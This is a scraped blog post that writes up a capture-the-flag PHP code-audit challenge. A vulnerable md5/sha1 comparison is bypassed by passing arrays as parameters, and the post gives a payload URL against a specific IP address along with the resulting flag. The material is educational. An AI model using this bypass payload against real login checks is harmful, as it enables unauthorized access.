Code audit -md5 () function - Code World

Code audit -md5 () function

Others 2019-08-25 10:23:29 views: null

<?php
error_reporting(0);
$flag = 'flag{test}';
if (isset($_GET['username']) and isset($_GET['password'])) {
if ($_GET['username'] == $_GET['password'])
print 'Your password can not be your username.';
else if (md5($_GET['username']) === md5($_GET['password']))
die('Flag: '.$flag);
else
print 'Invalid password';
}
?>

username and password can not be the same, but again the same md5

Loopholes md5 function, does not recognize md5 array, return null, can be bypassed

The same functions are also vulnerable to this issue sha1

payload

http://123.206.87.240:9009/18.php?username[]=1&password[]=2

get

Flag: flag{bugk1u-ad8-3dsa-2}

Guess you like

Origin www.cnblogs.com/gaonuoqi/p/11406954.html

Code audit -md5 () function

Equal to bypass encryption code audit -md5

ASP standard MD5 encryption signature function code

Code audit -sha () function compares bypass

md5 encryption code

In PHP md5 () function bypassing

xls add MD5 function

[Information Security] MD5 Hash Function

ASCII code ordering and md5 encryption

Java code to generate MD5

MD5 code and related derivatives

Implementation of java MD5 encryption code

JSP standard MD5 encryption code

View the MD5 code of the keystore by command

Qt get file MD5 code

MD5 code online decryption

PHP code audit 5 - XSS vulnerability

Python generates a random number function and encryption function (MD5)

Code audit_MD5 salt & XSS$ command execution & My-cmsms target machine

Cryptage MD5 (2) : détails de l'implémentation du code MD5

The pit encountered by jmeter md5 function assistant (__digest)! ! !

MD5 function of Delphi docking express delivery

JMeter performs function assistant MD5 encryption

Introduction to Ranger and Ranger Audit audit function modules

PHP Code Audit 17—CLTPHP Code Audit

Detailed MD5 encrypted code in Python3

JS calculate local file MD5 code

aws cli: ERROR:root:code for hash md5 was not found

aws cli: ERROR:root:code for hash md5 was not found

Code implementation of custom MD5 salt encryption method

Recommended

Arc Browser for Windows 1.0 officially GA

A programmer born in the 1990s developed a video porting software and made over 7 million in less than a year. The ending was very punishing!

Ranking

1. Select Sort

Create a thread thread

3 press to play ball that reach 6

Programmation CUDA (4) : gestion de la mémoire

SpringBoot database connection pool Druid error

E Diudiu App redesign summary

4EVERLAND Hosting now supports SNS+IPFS

About HTTPS

[vue3+vite+ts+element-plu+sass] uses bug records in sass

Interpretation of HUAWEI CLOUD GaussDB (for Influx): Best Practice Data Modeling

Daily

More

2024-05-03(8)

2024-05-02(0)

2024-05-01(4)

2024-04-30(36)

2024-04-29(5)

2024-04-28(12)

2024-04-27(29)

2024-04-26(22)

2024-04-25(32)

2024-04-24(30)